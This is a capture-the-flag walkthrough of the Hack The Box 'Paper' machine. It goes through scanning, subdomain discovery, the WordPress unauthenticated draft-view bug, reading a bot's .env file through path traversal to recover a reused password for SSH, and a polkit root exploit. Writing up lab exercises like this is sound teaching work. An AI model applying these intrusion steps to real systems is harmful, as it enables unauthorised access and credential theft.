🟢paper

Recon & Enum

Port scan

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

Directory scan

/.html                (Status: 403) [Size: 199]
/manual               (Status: 301) [Size: 235] [--> http://10.10.11.143/manual/]
/.html                (Status: 403) [Size: 199]

Website (80) and (443)

Both port has same HTTP Server Test Page , also cant found something useful in /maual directory

Burp Suite Enumeration

Although both port show same page {HTTP Server Test Page} , here i found something different :- while checking the response for both ports , i found that the home page is forbidden on both ports other thing i noticed that if u intercept the request for port it give you an extra header in response "X-Backend-Server" , it reveals the site name

HTTP/1.1 403 Forbidden
Date: Fri, 05 May 2023 13:43:30 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Connection: close
Content-Type: text/html; charset=UTF-8

Subdomain enumeration

ffuf -u http://FUZZ.office.paper -w ~/chaos/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt

FUZZ : chat 

new domain found >> chat.office.paper

now we can add both domains , in /etc/hosts and enumerate more

http://office.paper

the https website showing the same HTTP Server Test Page , so we moved to port 80 website THE website looks like that and their are articles on the web page as well as , their is word-press running on website ..... we will enumerate it later on

After looking sometime and browsing a little i found something weird , but eye catching

http://chat.office.paper

On the page , their is login page running with rocket.chat but if look closely their is also something noticable under the LOGIN BUTTON it says "Registration can only be done using the secret registration URL!"

Vulnerability in wordpress

wp-scan

we got 48 vulnerability , but based on above research i though this work best for us :-

 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/

Proof of Concept for \0day.work

Explanation

As per of above research their is mail from nick which says "Michael, you should remove the secret content from your drafts ASAP, as they are not that secure as you think!" so it indicates that- michael stores secret content in his drafts we also find a wordpress vulnerability which allow us to view draft {unauthenticated}

POC

/?static=1

injecting in url >>    http://office.paper/?static=1

we got the secret url ,

http://chat.office.paper/register/8qozr226AhkCHZdyY

shell as dwight

http://chat.office.paper/channel/general

On the website , their is only chats between some people what makes it exiting ? their is a discusion about a bot who is made by "dwight" and can perform some actions and run some commands ,

i try to read user flag , but no success.....says permission denied After enumerating a bit , i found a ".env" file in " /home/dwight/hubot/ " which contains password :- Queenofblad3s!23

 <!=====Contents of file ../../../../../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../../../../../../../home/dwight/hubot/.env=====>
<!=====End of file ../../../../../../../home/dwight/hubot/.env=====>

I thought this bot is made by "dwight" , so its worth to give ssh a shot and BOOM.....got the shell

privesc dwight => root

linpeas.sh

i found the machine is vulnerable to CVE-2021-3650

exploit :-

GitHub - secnigma/CVE-2021-3560-Polkit-Privilege-EsclationGitHub

explanation :-

Privilege escalation with polkit: How to get root on Linux with a seven-year-old bugThe GitHub Blog

we got the shell as root

PreviousArmageddon Nextpoison

Last updated 2 years ago

hashtagRecon & Enum

hashtagPort scan

hashtagDirectory scan

hashtagWebsite (80) and (443)

hashtagBurp Suite Enumeration

hashtagSubdomain enumeration

hashtaghttp://office.paper

hashtaghttp://chat.office.paper

hashtagVulnerability in wordpress

hashtagwp-scan

hashtagPOC

hashtagshell as dwight

hashtaghttp://chat.office.paper/channel/generalarrow-up-right

hashtagprivesc dwight => root

hashtaglinpeas.sh